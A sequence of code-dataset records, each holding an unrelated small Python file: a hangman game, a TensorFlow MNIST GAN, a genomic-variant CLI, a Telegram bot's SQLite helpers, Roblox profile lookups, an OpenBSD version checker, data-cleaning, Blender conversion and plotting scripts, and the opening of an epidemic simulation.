rangeEnd + interval\ndel Moving\nelapsedTime = time.time() - startTime\nprint(elapsedTime)\nprint(elapsedTime * 345600)\t","sub_path":"timetest.py","file_name":"timetest.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"546181342","text":"import random\n\nWORDS = [\"аист\", \"акула\", \"бабуин\", \"баран\", \"барсук\", \"бобр\", \"бык\", \"варан\", \"верблюд\", \"волк\", \"вомбат\", \"воробей\", \"ворон\", \"выдра\",\n\"голубь\", \"гусь\", \"додо\", \"дятел\", \"енот\", \"ехидна\", \"еж\", \"жаба\", \"жираф\", \"журавль\", \"заяц\", \"зебра\", \"землеройка\", \"зяблик\",\n\"игуана\", \"кабан\", \"казуар\", \"кайман\", \"какаду\", \"кальмар\", \"камбала\", \"канарейка\", \"каракатица\", \"карп\", \"кенгуру\",\n\"киви\", \"кит\", \"лама\", \"ламантин\", \"ласка\", \"ласточка\", \"лебедь\", \"лев\", \"лемур\", \"ленивец\", \"леопард\", \"лиса\", \"лягушка\",\n\"мотылек\", \"муравьед\", \"муравей\", \"мангуст\", \"медведь\", \"морж\", \"муха\", \"мышь\", \"медуза\", \"нарвал\", \"носорог\", \"орел\", \"омар\", \"олень\", \"овцебык\",\n\"осьминог\", \"орел\", \"осел\", \"оса\", \"овца\", \"опоссум\", \"обезьяна\", \"паук\", \"пескарь\", \"пингвин\", \"пиранья\", \"попугай\",\n\"пчела\", \"рысь\", \"рыба\", \"росомаха\", \"страус\", \"сурок\", \"стрекоза\", \"сорока\", \"сова\", \"снегирь\", \"сокол\", \"собака\", \"слон\",\n\"слон\", \"скорпион\", \"скворец\", \"скат\", \"сельдь\", \"свинья\", \"сурикат\", \"скунс\", \"слизень\", \"светлячок\", \"тюлень\", \"тукан\", \"тигр\",\n\"трясогуска\", \"термит\", \"тетерев\", \"тунец\", \"тритон\", \"тарантул\", \"таракан\", \"тля\", \"утконос\", \"уж\", \"устрица\", \"улитка\", \"угорь\", \"фазан\", \"фламинго\",\n\"форель\", \"хорек\", \"хомяк\", \"хамелеон\", \"цапля\", \"цесарка\", \"цикада\", \"черепаха\", \"червь\", \"чайка\", \"шимпанзе\", \"шиншилла\",\n\"щука\", \"эму\", \"ящерица\", \"ястреб\", \"як\", \"ягуар\"]\n\n\nMAX_ERRORS = 10\n\n\ndef return_random_word():\n return random.choice(WORDS)\n\n\ndef handle_user_input():\n user_input = input('Please, input letter: ')\n return user_input\n\n\ndef get_initial_statuses(word):\n statuses = []\n for letter in word:\n statuses.append(False)\n return statuses\n\n\ndef is_game_finished(statuses, current_errors):\n if current_errors >= MAX_ERRORS:\n return True\n\n for status in statuses:\n if not status:\n return False\n\n return True\n\n\ndef perfom_check_action(word, statuses, letter):\n if letter not in word:\n return False\n\n for index, l in enumerate(word):\n if letter == l:\n statuses[index] = True\n\n return True\n\n\ndef print_word(word, statuses):\n for index, letter in enumerate(word):\n if statuses[index]:\n print(letter, end='')\n else:\n print('_', end=' ')\n print()\n\n\ndef main():\n word = return_random_word()\n statuses = get_initial_statuses(word)\n current_errors = 0\n\n while not is_game_finished(statuses, current_errors):\n print_word(word, statuses)\n print('Errors left: ', MAX_ERRORS - current_errors)\n letter = handle_user_input()\n result = perfom_check_action(word, statuses, letter)\n\n if not result:\n current_errors += 1\n\n if current_errors >= MAX_ERRORS:\n print('You lose!')\n else:\n print('You win!')\n\n\nmain()\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"550113710","text":"import tensorflow as tf\nimport numpy as np\nimport unittest\n\n\nclass GAN(object):\n def __init__(self, learning_rate):\n self._setup_inputs()\n tf.summary.image('target_images', self.target_images)\n\n target_labels = tf.one_hot(self.target_labels, 10)\n with tf.variable_scope('generator'):\n self.mnist_generated = \\\n self._generator(self.input_noise, target_labels, training=False)\n tf.summary.image('generated_images', self.mnist_generated)\n\n with tf.variable_scope('generator', reuse=True):\n self.generated = \\\n self._generator(self.input_noise, target_labels)\n\n with tf.variable_scope('discriminator'):\n self.logits, self.outputs = \\\n self._discriminator(self.target_images, training=False)\n\n with tf.variable_scope('discriminator', reuse=True):\n true_logits, _ = self._discriminator(self.target_images)\n\n with tf.variable_scope('discriminator', reuse=True):\n false_logits, _ = self._discriminator(self.generated)\n\n with tf.name_scope('loss'):\n self.d_loss1 = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=true_logits,\n labels=target_labels))\n self.d_loss2 = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=false_logits,\n labels=tf.zeros_like(target_labels)))\n self.d_loss = tf.add(self.d_loss1, self.d_loss2, name='d_loss')\n\n self.g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=false_logits,\n labels=target_labels), name='g_loss')\n\n with tf.name_scope('optimization'):\n g_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, 'generator')\n d_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, 'discriminator')\n\n self.learning_rate = tf.Variable(learning_rate, trainable=False,\n name='learning_rate')\n self.train_g = tf.train.AdamOptimizer(\n self.learning_rate).minimize(self.g_loss, var_list=g_vars)\n\n self.train_d = tf.train.AdamOptimizer(\n self.learning_rate).minimize(self.d_loss, var_list=d_vars)\n\n with tf.name_scope('evaluation'):\n self.accuracy = self._evaluate(self.outputs, self.target_labels)\n tf.summary.scalar('train_accuracy', self.accuracy)\n\n with tf.name_scope('summary'):\n self.summary = tf.summary.merge_all()\n\n def _setup_inputs(self):\n self.target_images = tf.placeholder(dtype=tf.float32,\n shape=[None, 28, 28, 1], name='target_images')\n self.keep_prob = tf.placeholder(dtype=tf.float32,\n shape=(), name='keep_prob')\n self.target_labels = tf.placeholder(dtype=tf.int32,\n shape=[None], name='target_labels')\n self.input_noise = tf.placeholder(dtype=tf.float32,\n shape=[None, 28, 28, 1], name='input_noise')\n\n def _deconv(self, inputs, output_size, kernel_size, stride,\n leak=0.1, training=True):\n deconv = tf.layers.conv2d_transpose(inputs, output_size,\n kernel_size, strides=stride,\n activation=lambda x: tf.nn.leaky_relu(x, leak))\n if training:\n deconv = tf.nn.dropout(deconv, keep_prob=self.keep_prob)\n return deconv\n\n def _block(self, inputs, output_size, leak=0.1, training=True):\n init = tf.variance_scaling_initializer(2.0)\n\n conv = tf.layers.conv2d(inputs, output_size, 3,\n activation=lambda x: tf.nn.leaky_relu(x, leak), padding='SAME',\n kernel_initializer=init)\n conv = tf.layers.conv2d(conv, output_size, 1,\n activation=lambda x: tf.nn.leaky_relu(x, leak), padding='SAME',\n kernel_initializer=init)\n\n if training:\n conv = tf.nn.dropout(conv, keep_prob=self.keep_prob)\n return conv\n\n def _stack(self, conv, output_size, leak=0.1, training=True, multiple=1):\n for _ in range(multiple):\n conv = self._block(conv, output_size, leak, training=training)\n return conv\n\n def _down_sample(self, inputs, output_size, kernel_size,\n leak=0.1, training=True):\n init = tf.variance_scaling_initializer(2.0)\n conv = tf.layers.conv2d(inputs, output_size, kernel_size, strides=2,\n activation=lambda x: tf.nn.leaky_relu(x, leak), padding='SAME',\n kernel_initializer=init)\n\n if training:\n conv = tf.nn.dropout(conv, keep_prob=self.keep_prob)\n return conv\n\n def _generator(self, input_noise, label, training=True):\n with tf.name_scope('reshape_label'):\n label_input = tf.reshape(label, [-1, 1, 1, 10])\n\n with tf.name_scope('deconv1'):\n deconv = self._deconv(label_input, 16, 8, 1, training=training)\n\n with tf.name_scope('deconv2'):\n deconv = self._deconv(deconv, 32, 8, 2, training=training)\n\n with tf.name_scope('deconv3'):\n deconv = self._deconv(deconv, 64, 5, 1, training=training)\n\n with tf.name_scope('deconv4'):\n deconv = self._deconv(deconv, 128, 3, 1, training=training)\n\n init = tf.variance_scaling_initializer(2.0)\n with tf.name_scope('conv5'):\n conv1 = tf.layers.conv2d(deconv, 128, 3,\n activation=lambda x: tf.nn.leaky_relu(x, 0.1), padding='SAME',\n kernel_initializer=init)\n conv2 = tf.layers.conv2d(input_noise, 128, 3,\n activation=lambda x: tf.nn.leaky_relu(x, 0.1), padding='SAME',\n kernel_initializer=init)\n conv = tf.concat([conv1, conv2], axis=3)\n conv = self._block(conv, 256, training=training)\n\n with tf.name_scope('conv6'):\n conv = self._block(conv, 256, training=training)\n\n with tf.name_scope('output'):\n ow = tf.get_variable('ow', shape=[3, 3, 256, 1],\n initializer=init)\n ob = tf.get_variable('ob', shape=[1],\n initializer=tf.zeros_initializer())\n logits = tf.add(\n tf.nn.conv2d(conv, ow, strides=[1, 1, 1, 1], padding='SAME'), ob,\n name='logits')\n return logits\n\n def _discriminator(self, input_images, training=True):\n with tf.name_scope('conv1'):\n init = tf.variance_scaling_initializer(2.0)\n # init = tf.random_normal_initializer(stddev=0.01)\n conv = tf.layers.conv2d(input_images, 32, 3,\n activation=lambda x: tf.nn.leaky_relu(x, 0.1), padding='SAME',\n kernel_initializer=init)\n\n with tf.name_scope('conv2'):\n conv = self._block(conv, 64, training=training)\n conv = self._down_sample(conv, 64, 3, training=training)\n\n with tf.name_scope('conv3'):\n conv = self._stack(conv, 128, training=training, multiple=2)\n conv = self._down_sample(conv, 128, 3, training=training)\n\n with tf.name_scope('conv4'):\n conv = self._stack(conv, 256, training=training, multiple=2)\n\n with tf.name_scope('conv5'):\n conv = self._stack(conv, 512, training=training, multiple=3)\n\n with tf.name_scope('conv6'):\n conv = self._block(conv, 1024, training=training)\n\n with tf.name_scope('output'):\n init = tf.variance_scaling_initializer(2.0)\n ow = tf.get_variable('ow', shape=[7, 7, 1024, 10],\n initializer=init)\n ob = tf.get_variable('ob', shape=[10],\n initializer=tf.zeros_initializer())\n logits = tf.nn.conv2d(conv, ow, strides=[1, 1, 1, 1], padding='VALID') + ob\n logits = tf.reshape(logits, [-1, 10], name='logits')\n outputs = tf.nn.sigmoid(logits)\n return logits, outputs\n\n def _evaluate(self, prediction, labels):\n eq = tf.cast(tf.equal(tf.cast(tf.argmax(prediction, axis=1), tf.int32),\n labels), tf.float32)\n return tf.reduce_mean(eq)\n\n\nclass TestGAN(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.gan = GAN(1e-3)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n cls.sess = tf.Session(config=config)\n cls.sess.run(tf.global_variables_initializer())\n\n @classmethod\n def tearDownClass(cls):\n cls.sess.close()\n\n def test_generator_output(self):\n labels = np.random.randint(0, 9, [1])\n noise = np.random.randn(1, 28, 28, 1)\n\n gen = self.sess.run(self.gan.mnist_generated, feed_dict={\n self.gan.target_labels: labels,\n self.gan.input_noise: noise,\n })\n print(np.mean(gen))\n print(np.std(gen))\n\n def test_discriminator_outptt(self):\n images = np.random.rand(1, 28, 28, 1)\n\n logits, outputs = self.sess.run([self.gan.logits, self.gan.outputs],\n feed_dict={\n self.gan.target_images: images,\n })\n print(np.mean(logits))\n print(np.std(logits))\n\n print(np.mean(outputs))\n print(np.std(outputs))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"kaggle/mnist/mnist_gan.py","file_name":"mnist_gan.py","file_ext":"py","file_size_in_byte":8301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"4895286","text":"'''\nVariant manipulation.\n\nCollect variants specified on the commandline or in VCF or CSV files, apply\nfilters, and write out a CSV file.\n\n%(prog)s \n --variants /path/to/first.vcf \\\n --variants /path/to/second.vcf \\\n --variant-filter \"ref=='A'\" \\\n --out-variants result.csv\n\n'''\nfrom __future__ import absolute_import\n\nimport argparse\nimport sys\nimport logging\nimport collections\n\nfrom . import configure_logging\nfrom .. import variant_includes\nfrom .. import variants_util\nfrom ..evaluation import parse_labeled_expression\n\nparser = argparse.ArgumentParser(usage=__doc__)\nvariants_util.add_args(parser)\nparser.add_argument(\"field\", nargs=\"*\")\nparser.add_argument(\"--no-standard-columns\",\n action=\"store_true\", default=False,\n help=\"Don't write standard columns (genome, contig, start, end, ref, alt)\")\n\nparser.add_argument(\"--chunk-rows\", metavar=\"N\", type=int,\n help=\"Write out current results after processing N rows.\")\n\nparser.add_argument(\"--limit\", metavar=\"N\", type=int,\n help=\"Process only the first N variants (useful for testing)\")\n\nparser.add_argument(\"--columns\",\n help=\"Column separated list of columns to output\")\n\nparser.add_argument(\"--rename-column\", nargs=2, action=\"append\", default=[],\n metavar=(\"FROM\", \"TO\"),\n help=\"Rename output column FROM to TO. Can be specified multiple times.\")\n\nparser.add_argument(\"--out\")\n\nparser.add_argument('--include-metadata', action=\"store_true\", default=False,\n help=\"Output variant metadata when loading from VCF (info column, etc).\")\n\nparser.add_argument('--include-variant-source',\n action=\"store_true\", default=False,\n help=\"Output the source file each variant originates from\")\n\nfor includeable in variant_includes.INCLUDEABLES:\n includeable.add_args(parser)\n\nparser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", default=False)\n\ndef run(raw_args=sys.argv[1:]):\n args = parser.parse_args(raw_args)\n configure_logging(args)\n\n df = variants_util.load_from_args_as_dataframe(args)\n if df is None:\n parser.error(\"No variants specified.\")\n\n logging.info(\"Loaded %d variants.\" % df.shape[0])\n\n # We run the inverse of the column renames on the input df.\n column_renames = {}\n if args.rename_column:\n column_renames = dict(args.rename_column)\n column_renames_inverse = dict((v, k) for (k, v) in args.rename_column)\n if len(column_renames) != len(column_renames_inverse):\n raise ValueError(\"Column renames are not 1:1\")\n\n df.columns = [\n column_renames_inverse.get(col, col) for col in df.columns\n ]\n\n extra_columns = collections.OrderedDict()\n for labeled_expression in args.field:\n (label, expression) = parse_labeled_expression(labeled_expression)\n extra_columns[label] = expression\n\n for (column, callable_or_expression) in extra_columns.items():\n df[column] = [\n variants_util.evaluate_variant_expression(\n callable_or_expression, row.to_dict(), row.variant)\n for (i, row) in df.iterrows()\n ]\n\n def save(df):\n if column_renames:\n df = df.copy()\n df.columns = [column_renames.get(col, col) for col in df.columns]\n\n if args.columns:\n columns = [x.strip() for x in args.columns.split(\",\")]\n else:\n columns = [x for x in df.columns.tolist() if x != \"variant\"]\n if not args.include_metadata:\n columns = [\n x for x in columns\n if x in extra_columns or not x.startswith(\"metadata_\")\n ]\n if args.no_standard_columns:\n columns = [\n x for x in columns\n if x in extra_columns or (\n x not in variants_util.STANDARD_DATAFRAME_COLUMNS)\n ]\n if not args.include_variant_source:\n columns = [\n x for x in columns\n if x in extra_columns or x != \"variant_source\"\n ]\n\n df_save = df[columns]\n if args.out is None:\n # Write to stdout.\n df_save.to_csv(sys.stdout, index=False)\n elif args.out.endswith(\".csv\"):\n df_save.to_csv(args.out, index=False)\n print(\"Wrote: %s\" % args.out)\n else:\n parser.error(\"Unsupported output file extension: %s\" % args.out)\n\n for includeable in variant_includes.INCLUDEABLES:\n if includeable.requested(args):\n logging.info(\"Running includeable: %s\" % includeable.name)\n instance = includeable.from_args(args)\n for num_rows in instance.compute(df, chunk_rows=args.chunk_rows):\n if args.chunk_rows is not None:\n save(df)\n\n if args.chunk_rows is None:\n save(df)\n \n","sub_path":"varlens/commands/variants.py","file_name":"variants.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"496823271","text":"import sqlite3\nimport os.path\nfrom contextlib import closing\n\nESTADOS = {\"AC\": \"Acre\",\n \"AP\": \"Amapá\",\n \"AM\": \"Amazonas\",\n \"PA\": \"Pará\",\n \"RO\": \"Rondônia\",\n \"RR\": \"Roraima\",\n \"TO\": \"Tocantins\"}\n\n\n__DB_NAME = None\n\n\ndef cria_banco():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n c.execute('''CREATE TABLE estados\n (id INTEGER PRIMARY KEY, sigla text, nome text)''')\n c.execute('''CREATE TABLE membros\n (id INTEGER PRIMARY KEY, nome text, estado integer, telegram integer)''')\n for sigla, estado in ESTADOS.items():\n c.execute(\"\"\"insert into estados(sigla, nome) values(?,?)\"\"\", (sigla, estado))\n c.execute(\"\"\"CREATE TABLE eventos\n (id INTEGER PRIMARY KEY, data timestamp, descricao text, link text,\n telegram integer)\"\"\")\n conn.commit()\n\n\ndef lista():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n print(\"Estados\")\n for linha in c.execute(\"\"\"select id, sigla, nome from estados\"\"\"):\n print(linha)\n print(\"Membros\")\n for linha in c.execute(\"\"\"select id, nome, estado, telegram from membros\"\"\"):\n print(linha)\n\n\ndef get_estado(estado):\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n c.execute(u\"\"\"select id, sigla, nome from estados where sigla = ? or nome = ?\"\"\",\n (estado.upper(), estado.title()))\n estado = c.fetchone()\n if estado is None:\n return None\n else:\n return estado[0]\n\n\ndef get_stats():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n c.execute(u\"\"\"select e.nome, count(*)\n from membros m, estados e\n where m.estado=e.id\n group by e.nome\n order by e.nome\"\"\")\n por_estado = c.fetchall()\n c.execute(u\"\"\"select count(*)\n from membros m\"\"\")\n total = c.fetchone()[0]\n return [por_estado, total]\n\n\ndef get_eventos():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n c.execute(u\"\"\"select * from eventos\n where data >= datetime('now')\n order by data\"\"\")\n eventos = c.fetchall()\n print(eventos)\n return eventos\n\n\ndef update_user(from_user, estado):\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n id = from_user.id\n c.execute(\"select id, nome, estado, telegram from membros where telegram=?\", (id,))\n membro = c.fetchone()\n if membro is None:\n c.execute(u\"insert into membros(nome, estado, telegram) values (?,?,?)\",\n (\"{0.first_name} {0.last_name}\".format(from_user),\n estado, id))\n else:\n c.execute(u\"update membros set nome = ?, estado = ? where telegram = ?\",\n (\"{0.first_name} {0.last_name}\".format(from_user),\n estado, id))\n conn.commit()\n\n\ndef lista_users():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n usuarios = [\"Membros por Estado:\"]\n for linha in c.execute(u\"\"\"select m.nome, e.nome from membros m, estados e\n where m.estado = e.id\n order by e.nome, m.nome\"\"\"):\n usuarios.append(\"{0[0]}, {0[1]}\".format(linha))\n return \"\\n\".join(usuarios)\n\n\ndef lista_users_por_nome():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n usuarios = [\"Membros:\"]\n for linha in c.execute(u\"\"\"select m.nome, e.nome from membros m, estados e\n where m.estado = e.id\n order by m.nome\"\"\"):\n usuarios.append(\"{0[0]}, {0[1]}\".format(linha))\n return \"\\n\".join(usuarios)\n\n\ndef conecta():\n return sqlite3.connect(__DB_NAME, detect_types=sqlite3.PARSE_DECLTYPES)\n\n\ndef inicializa(nome=\"membros.db\"):\n global __DB_NAME\n __DB_NAME = nome\n existe = os.path.exists(nome)\n\n if not existe:\n cria_banco()\n\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"17298035","text":"import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n#Params\ndataSet = 2;\ns=5\n\n\n#Open data file\ncount = 0\nimuFile=\"data/newimudata6.txt\"\nmotorFile=\"data/newmotordata6.txt\"\nwith open(imuFile,\"r\") as f:\n\t#Get number of data entries\n\tfor line in f:\n\t\tcount=count+1\n\n#Set up empty arrays\nt=np.empty([count,1])\nroll=np.empty([count,1])\n\nwith open(imuFile,\"r\") as f:\n\t#Parse data from file\n\tfor i,line in enumerate(f):\n\t\tdata=line.split(\",\")\n\t\tt[i]=data[0]\n\t\troll[i]=data[1]\n\t\t\nroll = (roll)\n\ncount1 = 0\nwith open(motorFile,\"r\") as f:\n\t#Get number of data entries\n\tfor line in f:\n\t\tcount1=count1+1\nt1=np.empty([count1,1])\npos=np.empty([count1,1])\nwith open(motorFile,\"r\") as f:\n\t#Parse data from file\n\tfor i,line in enumerate(f):\n\t\tdata=line.split(\",\")\n\t\tt1[i]=data[0]\n\t\tpos[i]=data[1]\n\n\"\"\"\nfor p in pos:\n\tif p>90:\n\t\tp = 90-p\n\tif p<-90:\n\t\tp = -90-p\n\n\t\t\n\"\"\"\n\npos=-pos;\nfor i in range(0,count):\n\t\n\t\n\t\n\t\n\tnum=pos[i]//360\n\tif (num>0 and num%2==0):\n\t\tpos[i] = pos[i]-num*360\n\tif (num>0 and num%2==1):\n\t\tpos[i] = (num+1)*360-pos[i]\n\n\n\n\n\"\"\"\n\tif (180(.*?)
  • ', joinResponseText).group(0))\n joinDateRa = re.sub('Join Date

    ', '', joinDateRaw)\n joinDate = re.sub('

  • ', '', joinDateRa)\n return joinDate\n if joinResponse.status_code != 200:\n return f'Got a {joinResponse.status_code}'\n\n\ndef verifiedCheck(userId):\n verifiedResponse = requests.get(f'https://api.roblox.com/ownership/hasasset?userId={userId}&assetId=102611803')\n if verifiedResponse.text == 'true':\n return True\n else:\n return False\n\t\t\ndef getRap(userId):\n types = ['Hat', 'HairAccessory', 'FaceAccessory', 'NeckAccessory', 'ShoulderAccessory', 'FrontAccessory', 'BackAccessory', 'WaistAccessory', 'Gear', 'Face']\n rap = 0\n for i in types:\n cursor = \"\"\n h = rapFunc1(userId, i, cursor)\n if \"data\" in h:\n for i in h[\"data\"]:\n if 'recentAveragePrice' in i:\n rap = rap + i['recentAveragePrice']\n if 'nextPageCursor' in h and h['nextPageCursor'] != 'None':\n cursor = h['nextPageCursor']\n else:\n break\n return rap\n\ndef rapFunc1(userId, i, cursor):\n res = requests.get(f'https://inventory.roblox.com/v1/users/{userId}/assets/collectibles?assetType={i}&limit=100&cursor={cursor}')\n res = res.json()\n return res\n\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56564505","text":"#!/usr/bin/env python\n# - encoding:utf8 -\n\"\"\"\nscrit for testing the possibility to upgrade the system\n\"\"\"\nfrom common.httputils import exist_http_page\nfrom common.maintenance import system_exec, logger\nfrom common.MailingSystem import add_paragraph\n\nbase_repository = \"https://ftp.openbsd.org/pub/OpenBSD/\"\n\n\ndef get_actual_version():\n \"\"\"\n retreave te actual version number\n :return: version\n \"\"\"\n ret, version = system_exec(\"uname -r\")\n version = version[0]\n if \".\" not in version:\n return \"0.0\"\n return \".\".join(version.split(\".\")[0:2])\n\n\ndef increment_version(old_version):\n \"\"\"\n determine the next version number\n :param old_version: the starting version\n :return: the version number incremented\n \"\"\"\n a, b = [int(i) for i in old_version.split(\".\")]\n if b < 9:\n b += 1\n else:\n b = 0\n a += 1\n return str(a) + \".\" + str(b)\n\n\ndef main(dry_run: bool = False):\n \"\"\"\n main script execution\n :param dry_run: if the script should be run without system modification\n :return:\n \"\"\"\n logger.log(\"newversion_check\", \"Daily OpenBSD version Check\" + [\"\", \" dry\"][dry_run])\n old_version = get_actual_version()\n new_version = increment_version(old_version).strip()\n url_new = base_repository + new_version + \"/\"\n if exist_http_page(url_new):\n logger.log(\"newversion_check\", \"WARNING: new OpenBSD version available!\", 1)\n add_paragraph(\"OpenBSD Version Check\",\n message=\"**WARNING**: new OpenBSD version available [here](\" + url_new + \")\")\n else:\n logger.log(\"newversion_check\", \"no new OpenBSD version available!\")\n # logger.log(\"newversion_check\",\" check at: '\"+urlnew+\"'\")\n url_new = base_repository + old_version + \"/\"\n if not exist_http_page(url_new):\n logger.log_error(\"newversion_check\", \"Actual OpenBSD version no more supported\")\n add_paragraph(\"OpenBSD Version Check\",\n message=\"**WARNING**: actual OpenBSD version no more supported\")\n else:\n logger.log(\"newversion_check\", \"Actual OpenBSD version still available!\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"p03_day/test_newversion.py","file_name":"test_newversion.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"182301045","text":"import pandas as pd\nfrom common import process_data\n\ncsv_df = pd.read_csv('../test.csv')\n\ncsv_df = process_data.get_clean_data(csv_df)\n\nprint(\n 'Before processing missing value, sample count =>\\n{}'.format(process_data.get_missing_value_sample_count(csv_df)))\nprint(\n 'Before processing missing value, sample proportion =>\\n{}'.format(\n process_data.get_missing_value_sample_proportion(csv_df)))\n\n# print(pd_csv.loc[pd_csv['TotalBsmtSF'].isnull()])\n# 將缺值的 TotalBsmtSF 以其平均數取代\ncsv_df['TotalBsmtSF'] = csv_df['TotalBsmtSF'].fillna(csv_df['TotalBsmtSF'].mean())\n# print(pd_csv['TotalBsmtSF'].isnull().sum())\n\nprint('Sample whose KitchenQual is null, KitchenAbvGr = ',\n csv_df.loc[csv_df['KitchenQual'].isnull()]['KitchenAbvGr'].values)\n# 找出 KitchenAbvGr 值為1的樣本,並列出它們的 KitchenQual\ncsv_df.loc[csv_df['KitchenAbvGr'] == 1]['KitchenQual']\n# 將缺值的 KitchenQual 以 'TA' 取代\ncsv_df['KitchenQual'] = csv_df['KitchenQual'].fillna('TA')\n# print(pd_csv['KitchenQual'].isnull().sum())\n\n# print('Sample whose GarageArea is null, GarageType = ', pd_csv.loc[pd_csv['GarageArea'].isnull()]['GarageType'].values)\n# 將缺值的 GarageArea 以 GarageType 為 'Detchd' 的樣本,其 GarageArea 的平均數取代\n# pd_csv['GarageArea'] = pd_csv['GarageArea'].fillna(int(pd_csv[pd_csv['GarageType']=='Detchd']['GarageArea'].mean()))\n# 將缺值的 GarageArea 以其平均數取代\ncsv_df['GarageArea'] = csv_df['GarageArea'].fillna(int(csv_df['GarageArea'].mean()))\n# print(pd_csv['GarageArea'].isnull().sum())\n\nprint('Sample whose SaleType is null, SaleCondition = ',\n csv_df.loc[csv_df['SaleType'].isnull()]['SaleCondition'].values)\n# 找出 SaleCondition 值為 'Normal' 的樣本,並列出它們的 SaleType\ncsv_df.loc[csv_df['SaleCondition'] == 'Normal']['SaleType']\n# 將缺值的 SaleType 以 'WD' 取代\ncsv_df['SaleType'] = csv_df['SaleType'].fillna('WD')\n# print(pd_csv['SaleType'].isnull().sum())\n\nprint('Sample whose GarageCars is null, GarageArea = ', csv_df.loc[csv_df['GarageCars'].isnull()]['GarageArea'].values)\n# 將缺值的 GarageCars 以 2 取代\ncsv_df['GarageCars'] = csv_df['GarageCars'].fillna(2)\n# print(pd_csv['GarageCars'].isnull().sum())\n\n# print('Sample whose MSZoning is null, MSSubClass = \\n', csv_df.loc[csv_df['MSZoning'].isnull()][['Id', 'MSSubClass']])\n# 找出 MSSubClass 值為 20/30/70 的樣本,並列出它們的 MSZoning\ncsv_df.loc[csv_df['MSSubClass'] == 20]['MSZoning']\ncsv_df.loc[csv_df['MSSubClass'] == 30]['MSZoning']\ncsv_df.loc[csv_df['MSSubClass'] == 70]['MSZoning']\n# 將缺值的 MSZoning 以 'RL' 取代\n# mask1 = (csv_df['MSZoning'].isnull()) & (csv_df['MSSubClass'] == 20)\n# csv_df.loc[mask1, \"MSZoning\"] = csv_df.loc[mask1, \"MSZoning\"].fillna('RL')\ncsv_df['MSZoning'] = csv_df['MSZoning'].fillna('RL')\n# print(csv_df['MSZoning'].isnull().sum())\n\n# 將缺值的 Utilities 以最常見的��取代\ncsv_df['Utilities'] = csv_df['Utilities'].fillna(csv_df['Utilities'].value_counts().index[0])\n\n# 將缺值的 Functional 以最常見的值取代\ncsv_df['Functional'] = csv_df['Functional'].fillna(csv_df['Functional'].value_counts().index[0])\n\nprint(\n 'After processing missing value, sample count =>\\n{}'.format(process_data.get_missing_value_sample_count(csv_df)))\nprint(\n 'After processing missing value, sample proportion =>\\n{}'.format(\n process_data.get_missing_value_sample_proportion(csv_df)))\n","sub_path":"EDA/EDA_for_predict_submission.py","file_name":"EDA_for_predict_submission.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"330269709","text":"#!/usr/bin/python\nimport bpy\nimport sys\nimport os\n\nargv = sys.argv\n\nargv = argv[argv.index(\"--\") + 1:] # get all args after \"--\"\n\nprint(argv) # --> ['example', 'args', '123']\n\nif len(argv[0]) > 0:\n inputfile = argv[0]\nelse:\n print(\"Error. No inputed file.\")\n\nif len(argv) >= 2:\n outputfile = argv[1]\nelse:\n outputfile = argv[0] + \".stl\"\n\nbpy.ops.wm.read_factory_settings(use_empty=True)\n\nbpy.ops.import_scene.gltf(filepath=inputfile)\nbpy.ops.export_mesh.stl(filepath=outputfile)\n","sub_path":"mapdata/impExp.py","file_name":"impExp.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492030914","text":"import random as rn\n\nclass Agent:\n\tdef __init__(self, id, is_infected, days_until_symptoms, total_days_sick, mortality_rate):\n\t\tself.id = id\n\n\t\tself.is_alive = True\n\t\tself.has_symptoms = False\n\t\tself.is_isolated = False\n\t\tself.is_infected = is_infected\n\t\tself.has_been_infected = is_infected\n\n\t\tself.day_infected = 0 if is_infected else float(\"-inf\")\n\t\tself.day_isolated = float(\"-inf\")\n\n\t\tself.days_until_symptoms = days_until_symptoms\n\t\tself.total_days_sick = total_days_sick\n\t\tself.mortality_rate = mortality_rate\n\n\t\tself.home = None\n\t\tself.office = None\n\n\tdef get_id(self):\n\t\treturn self.id\n\n\tdef set_home(self, home):\n\t\tself.home = home\n\n\tdef set_office(self, office):\n\t\tself.office = office\n\n\tdef can_get_infected(self):\n\t\tif self.is_infected or self.has_been_infected:\n\t\t\treturn 